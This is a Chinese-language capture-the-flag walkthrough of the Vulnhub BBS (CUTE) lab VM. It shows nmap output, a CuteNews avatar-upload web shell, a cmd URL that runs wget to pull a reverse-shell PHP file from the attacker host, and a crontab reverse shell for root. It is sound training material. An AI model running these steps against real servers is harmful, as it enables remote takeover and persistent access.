Vulnhub 567 BBS (CUTE) 1.0.2

考点:任意文件上传,定时任务

靶机链接:https://www.vulnhub.com/entry/bbs-cute-102,567/

环境配置

名称IP
Kali Linux10.0.2.15
BBS (CUTE)10.0.2.11

初步打点

端口扫描

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ export rip=10.0.2.11
$ sudo nmap -v -A -p- $rip
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) UTF8(USER) TOP STLS IMPLEMENTATION(Courier Mail Server) PIPELINING USER UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after:  2021-09-17T16:28:06
| MD5:   5ee2 40c8 66d1 b327 71e6 085a f50b 7e28
|_SHA-1: 28a3 acc0 86a7 cd64 8f09 78fa 1792 7032 0ecc b154
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) TOP UTF8(USER) IMPLEMENTATION(Courier Mail Server) PIPELINING USER UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after:  2021-09-17T16:28:06
| MD5:   5ee2 40c8 66d1 b327 71e6 085a f50b 7e28
|_SHA-1: 28a3 acc0 86a7 cd64 8f09 78fa 1792 7032 0ecc b154

WEB测试

端口88

未发现有用信息

端口80

dirbdirsearch都发现了index.php

漏洞发现

查看利用脚本,发现CuteNews目录需要手工去除

使用新建的用户ZOu0fykHPn登录

获得权限

靶机测试

头像处是上传的shell

访问http://10.0.2.11/uploads/avatar_ZOu0fykHPn_ZOu0fykHPn.php文件存在

下载r444.php

1
http://10.0.2.11/uploads/avatar_ZOu0fykHPn_ZOu0fykHPn.php?cmd=wget http://10.0.2.15/reverse/r444.php

访问http://10.0.2.11/uploads/r444.php

反弹shell成功

提权

将反弹shell写入crontab


最后修改于 2020-09-24